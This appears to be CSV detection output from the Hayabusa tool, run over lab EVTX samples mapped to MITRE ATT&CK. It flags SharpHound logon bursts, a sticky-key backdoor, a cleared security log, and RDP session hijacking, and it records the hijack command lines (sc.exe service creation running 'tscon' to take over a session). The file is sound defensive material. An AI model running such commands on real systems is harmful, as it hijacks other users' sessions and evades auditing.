2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: 
C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: 
C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: 
C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 
